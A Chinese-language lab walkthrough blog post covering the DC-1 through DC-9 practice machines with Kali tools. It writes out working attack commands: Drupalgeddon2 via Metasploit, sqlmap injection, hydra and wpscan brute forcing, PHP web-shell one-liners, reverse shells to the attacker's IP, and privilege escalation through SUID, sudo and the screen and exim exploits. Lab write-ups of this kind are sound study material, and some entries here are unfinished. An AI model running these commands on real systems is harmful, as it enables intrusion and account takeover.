DC-1实战
大致流程(copy博客为lainwith的)
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147
3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看
4、目录遍历dirb http://192.168.149.147,无可用信息
5.、启动Metersploit来查看漏洞并利用漏洞msfconsole
6、寻找关于 drupal 的模块search drupal
7、选用2018年的exploit/unix/webapp/drupal_drupalgeddon2
use 对应模块
show options 查看信息
set rhosts 主机ip
set rhosts 靶机ip
run 运行
exploit 攻击
8、这样我们就可以成功得到一个会话meterpreter
利用会话直接ls发现flag1.txt
9、查看下flag1.txt内容cat flag1.txt得到一个提示
10、根据提示百度drupal配置文件的位置cat /var/www/sites/default/settings.php发现数据库账号dbuser和密码R0ck3t
11、要进入数据库,首先需要进入shell,然后确认一下端口,看数据库开了没。id、netstat -antpl然后看到3306端口开了
12、这个时候需要注意,不能直接msf进入,因为msf是从web服务打进去的,而HTTP是瞬时协议,需要让python来做一个中介。用python转换成标准的shellpython ‐c "import pty;pty.spawn(’/bin/bash’)"
13、进入数据库mysql -udbuser -pR0ck3t
14、
mysql> show databases;
mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;
mysql> select name,pass from users;
查到密码是加密的,先把密码的密文copy到一边备用
15、exit;退出数据库,在此修改密码为cd1
www-data@DC-1:/var/www$ php scripts/password-hash.sh cd1
16、再进入数据库drupaldb下重置密码update users set pass='$S$DJaod0REFWY5314KoXAnsZai5IBapyuu6zx510yDThIN5YzojVTT' where name='admin';
17、浏览器输入用户名:admin 密码:cd1 成功登录并发现flag3
18、msf端的shell退出数据库,去cat /etc/passwd
19、根目录下载:
爆破语句:hydra -l flag4 -P /usr/share/john/password.lst 192.168.40.136 ssh -vV -f
爆出账号密码是flag4:orange
20、使用ssh登录系统 flag4下:ls、cat flag4.txt、探测SUID和sudo -l,结果发现find就有SUID,find -exec “/bin/sh” ; whoami,cd /root , ls , cat thefinalflag.txt结束!
DC-2实战
大致流程(copy博客为lainwith的)
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.148
3、扫描端口nmap -sV -p- 192.168.149.148,查看端口信息,得知80端口开放,浏览器访问80端口查看,发现访问不到,dns被解析。
4、回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件
5、配置hosts文件(两种办法)
(1)kali修改hosts
sudo vim /etc/hosts
(2)windows修改hosts
C:Windows\System32\drivers\etc\hosts
6、再次访问网站,即可进入。并拿到了flag1
7、目录遍历
由于靶机的网站页面是wordpress,所以选择wpscan来扫目录
1:先更新一下wpscan --update
2:简单扫描一下 wpscan --url dc-2
或者是用这个语句:
8、wpscan换一种用法,列出站点的3个账号 wpscan --url dc-2 -e u
9、爆破的话需要用户名字典,很明显,就是admin,jerry和tom那三个用户,密码字典则是刚拿下flag1爬站时生成的pwd.dic字典,工具这里选择使用wpscan了
命令:
wpscan --url dc-2 -U user.txt -P pwd.dic
爆出了两个账户
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
10、网站登录两个账户尝试,发现登录tom,发现了flag2
11、登录ssh,由于靶机的ssh不是22,所以需要指定端口。ssh tom@192.168.40.137 -p 7744
12、发现了flag3,但是由于自己用的是rbash,所以无法使用cat命令,需要绕过rbash限制。
13、查看一下/etc/passwd,看到了jerry,登入jerry账户
14、输入如下命令,会强制进入交互状态
sudo git -p --help
再调用bash
!/bin/bash
现在就能以root身份执行命令了
DC-3实战
环境kali
1、首先ifconfig 得知ip为192.168.149.151.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.151
3、扫描端口nmap -sV -p- 192.168.149.151,查看端口信息,得知80端口开放,浏览器访问80端口查看
4、使用nikto来收集一下nikto --url http://192.168.149.151/,爆出后台地址,浏览器访问
5、安装扫描工具:apt-getinstall joomscan,使用该网站模板对应的扫描工具扫一波:joomscan --url "http://192.168.149.151/"发现网站模板的版本是3.7.0
6、发现Joomla版本号与后台管理地址,使用searchsploit查看是否有可以使用的EXP: searchsploit joolma 3.7.0,发现了有一个sql注入漏洞
7、复制到/root:git clone https://github.com/Tuhinshubhra/CMSeeK
8、在CMSeeK文件打开终端:python3 cmseek.py --url http://192.168.149.151
9、输入searchsploit joomla 3.7.0,再输入cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root,找到漏洞详细信息。
10、跑数据库:sqlmap -u “http://192.168.40.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --batch --dbs -p list[fullordering]
11、跑表:sqlmap -u “http://192.168.40.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -p list[fullordering] --current-db
12、跑列:sqlmap -u “http://192.168.40.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 -p list[fullordering] -D “joomladb” --tables -T “#__users” --columns 注意:选y、选1、选10
13、跑名:sqlmap -u “http://192.168.40.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 -p list[fullordering] -D “joomladb” --tables -T “#__users” --columns -C “username,password” --dump
14、拿到用户名、密码:
15、输入vim 1.txt,把密码放进去,:wq回车,cat 1.txt,john 1.txt,爆出密码:snoopy
16、登陆后台,寻找上传点:在Extensions模块中的Templates模块中的Beez3新建一个文件New File(shell.php),在此下写入一句话木马:<?php @eval($_POST['xxx']);?> 用蚁剑测试连接。
17、通过在蚁剑上执行命令来反弹shell到kali:在蚁剑任意文件下上传一个自己写的1.php文件,内容是 <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.149.132 1234 >/tmp/f');?>
另17、找到index.php写入system("bash -c ‘bash -i >& /dev/tcp/192.168.149.132/1234 0>&1’ "); 也可以实现监听。
18、kali中输入:nc -lvp 1234监听成功后输入:id,whoami测试,再输入www-data
因为没有监听成功,接下来就比较模糊了。。。
19、使用searchsploit搜索主机Ubuntu 16.04有关提权漏洞:searchsploit Ubuntu 16.04
20、查看漏洞介绍cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu-1604-shell.txt
21、cat ubuntu-1604-shell.txt
22、wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
23、unzip 39772.zip #解压29772.zip文件
cd 39772
tar -xvf exploit.tar #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
24、./compile.sh #执行脚本,编译文件
25、./doubleput #执行提权文件
26、root,cd /root,ls,catthe-flag.txt
DC-4实战
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.149
3、扫描端口nmap -sV -p- 192.168.149.149,查看端口信息,得知80端口开放,浏览器访问80端口查看,发现是一个登录界面。
4、burp爆破账户密码为 admin happy,进入后再用burp抓包发送到repeater模块,修改radio为nc 192.168.149.132 666 -e /bin/bash。另一边kali里面输入nc -lvvp 666。这个时候repeater里go
5、whoami再python -c 'import pty;pty.spawn("/bin/sh")'
6、查看home目录 cd /home 查看账户ls,随便看看,找到jim中找出来的密码保存在root文件管理中
7、root下开启hydra,输入命令:hydra -l jim -P /root/a.txt ssh://192.168.149.149 爆出账户为 jim 密码为 jibril04
8、root下使用ssh远程登陆:ssh jim@192.168.149.149
9、ls看到了jim下有一个test.sh
10、输入cd /var/mail 然后在此目录下ls,发现了一个jim文件,cat jim,发现密码^xHhA&hvim0y,还发现了是charles给jim发送的一封密码邮件。
11、切换到用户charles发现使用sudo查看配置文件:su charles,sudo -l发现该用户可以以root权限免密码执行 /usr/bin/teehee
12、**cd /**到charles@dc-4下,echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
13、直接 su admin,直接无密码进入。cd root,ls,cat flag.txt
DC-5实站
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.152
3、扫描端口nmap -sV -p- 192.168.149.152,查看端口信息,得知80端口开放,浏览器访问80端口查看,发现是一个类似留言板的网页。
4、输入xss payload尝试,把URL的参数部分全部去掉,再刷新一下页面,发现Copyright的年份变了,再刷新页面,年份又变了,说明Copyright不是HTML写的,可能是后台的动态脚本写的。
5、可能存在文件包含,目录爆破一下,发现footer.php这个目录是有用的。当刷新footer.php时,发现Copyright在变,而刷新thankyou.php同理,可以确认,网站存在文件包含。
6、上面已经发现靶机存在文件包含,但是如果想要利用的话,就必须确认这个文件包含的动态的,是可控的,而要确认这一点,首先需要知道它实现包含的参数是什么?盲猜一个:?path=footer.php。很明显,失败了。上BurpSuite,爆路径,参数极有可能是file,令参数为file,路径为/etc/passwd。执行成功。说明靶机确实存在文件包含漏洞。
7、那么,接下来需要判断他是不是可以远程文件包含,如果可以的话,那就直接上木马,如果没有,再另寻他法。发现不支持远程文件包含,那只能本地文件包含了。
(远程文件包含,本地文件包含不大了解)
8、由于已经确定只能本地文件包含,那就可以考虑报错攻击,写一个payload传进去让服务器报错,找到服务器的日志,再去利用payload。
9、用bp找日志服务器,上bp爆破日志记录。发现日志在/var/log/nginx/access.log
10、一句话木马:
刷新日志,发现写入成功,蚁剑连接
文件包含漏洞的特点:
无视文件扩展名读取文件
无条件解析PHP代码
在tmp目录下新建一个文件,先上传,之后写入一句话木马。
浏览器下发现文件写入成功。
11、提权:试了试cd /root在蚁剑终端中不能进 root ,只可以whoami看看,nc-h再试试,看到-e有参数。
12、kali中开启监听,nc -lvvp 端口号
13、蚁剑反弹shell,nc -e /bin/bash kali ip 端口
14、kali拿到shell ,id , whoami
15、交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者
python -c 'import pty; pty.spawn("/bin/bash")'
进入www-data@dc-5
16、cd / , sudo -l , find / -perm /4000 2>dev/null查找到可用于screen 4.5.0的漏洞脚本文件
17、kali开一个终端:searchsploit screen 4.5.0
18、进入桌面cp/usr/share/exploitdb/exploits/linux/local/41152.txt 41152.text
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh 然后ls查看是否写入
19、漏洞脚本文件的利用将41154.sh中上面一部分c语言代码另存为libhax.c 编译libhax.c文件gcc -fPIC -shared -ldl -o libhax.so libhax.c
20、将41154.sh中下面一部分c语言代码另存为rootshell.c 编译rootshell.c文件gcc -o rootshell rootshell.c
21、将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错
22、使用蚁剑将libhax.so 、rootshell 、dc5.sh三个文件上传到服务器的/tmp目录下。
23、获取最终的flag
为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限
cd /tmp
chmod +x dc5.sh或者chmod 777 dc5.sh
ls -l
./dc5.sh
24、获取root权限后,进入root目录下,成功获取thisistheflag.txt文件
whoami
id
cd /root
ls
cat thisistheflag.txt*
DC-6实站
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.153
3、扫描端口nmap -sV -p- 192.168.149.153,查看端口信息,得知开放端口,浏览器访问查看,发现和dc-2一样访问不到网页,需要配置hosts文件(物理机和kali都添加)。浏览器访问,发现wordpress5.1.1 版本漏洞
4、发现自带的wpscan数据库升级不了,百度解决方法:
5、wpscan --url http://wordy/ --enumerate u 爆出用户,保存起来,用于后面爆破。
6、dirb 靶机ip,目录遍历出后台地址 http://192.168.149.153/wp-admin/network/
7、Wpscan –url http://wordy –U name.txt –P passwords.txt,(不知道密码库从哪里弄的,总之是知道用户名和密码) 用户名:mark,密码:helpdesk01,登陆后台。
8、进入后台发现左栏目activity_monitor插件漏洞,searchsploit activity monitor
9、进入文件系统在webapps打开终端,将45274.html移到root里面。
10、burp抓包,发送repeater模块,修改数据。同时kali监听:nc -lvvp 4444
加粗样式
11、kali里面whoami测试,**python3 -c ‘import pty;pty.spawn("/bin/bash")’**进入
12、一通乱找:pwd 、 ls -l 、cd /home/mark/stuff、 ls 在home下发现了things-to-do.txt文件,从中得到了grahamd账户和密码Gso7isUM1D4,并进行ssh登陆:ssh grahamd@127.0.0.1
13、sudo -l、 cat /home/jens/backups.sh下面的语句一一执行
14、按下面步骤:nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)
利用过程:写入一个执行bash的nmap脚本,运行(这两行是关键代码)
echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
DC-7实战
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.167
3、扫描端口nmap -sV -p- 192.168.149.167,查看端口信息,得知开放端口,浏览器访问查看。发现用户@DC7USER,放百度里面查找,github里面staffdb->config找到了用户名和密码(或者百度用别的办法也行,百度还有将源码下载到kali再查找用户名和密码的方法)
$username = “dc7user”; $password = “MdR3xOgB7#dW”;
4、kali 登陆 用户名和密码,ssh dc7user@靶机ip、 ls查看 、cat mbox查看可执行性文件
5、cd /opt/scripts、ls、cat backups.sh、发现脚本文件中drush 命令可以修改密码
6、 网站有默认的admin账号,必须进入/var/www/html目录下才能使用drush命令修改密码,必须在drush环境下才能调用drush命令。
修改密码语句:drush user-password admin --password="123456"
7、到这步什么鬼。。。明天继续。。。
DC-8 实战
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.168
3、扫描端口nmap -sV -p- 192.168.149.168,查看端口信息,得知开放端口,浏览器访问查看,发现有sql注入,sqlmap跑用户名和密码。sqlmap用起来发现忘了,这里正好复习一下:
01、先找注入点
02、爆库,不选内置库
03、爆表
04、爆列
05、爆值
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4、使用john工具进行破解,得到登录密码(这里用户名叫做john也是一种提示)
5、登录后台后,找到这个模块写入shell 同时 kali 中设置监听:nc -lvvp 4444
6、 kali寻找突破口:find / -user root -perm -4000 -print 2>/dev/null,看到一个exim4,python -c ‘import pty;pty.spawn("/bin/bash")’,进入www-data下
7、searchsploit exim,找到一个46996.sh,想办法把它下载到www-data下
8、根据这个路径:/usr/share/exploitdb/exploits/linux/local/46996.sh / 找到46996.sh,复制到root下
10、(这个也许没用)python -m SimpleHTTPServer 8000
11、cd到tmp中,wget http://kali的ip:8000/46996.sh 、ls查看一下
12、加权限:chmod +x 46996.sh
13、./46996.sh -m netcat、id、cat /root、ls、cat flag.txt
DC-9 实战
环境kali
1、首先ifconfig 得知ip为192.168.149.xxx/
2、局域网探测arp-scan -l 得知靶机ip为192.168.149.189
3、扫描端口nmap -sV -p- 192.168.149.189,查看端口信息,得知开放端口,浏览器访问查看,发现有sql注入
参考文章:https://blog.csdn.net/qq_43462485/article/details/109456721
503
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
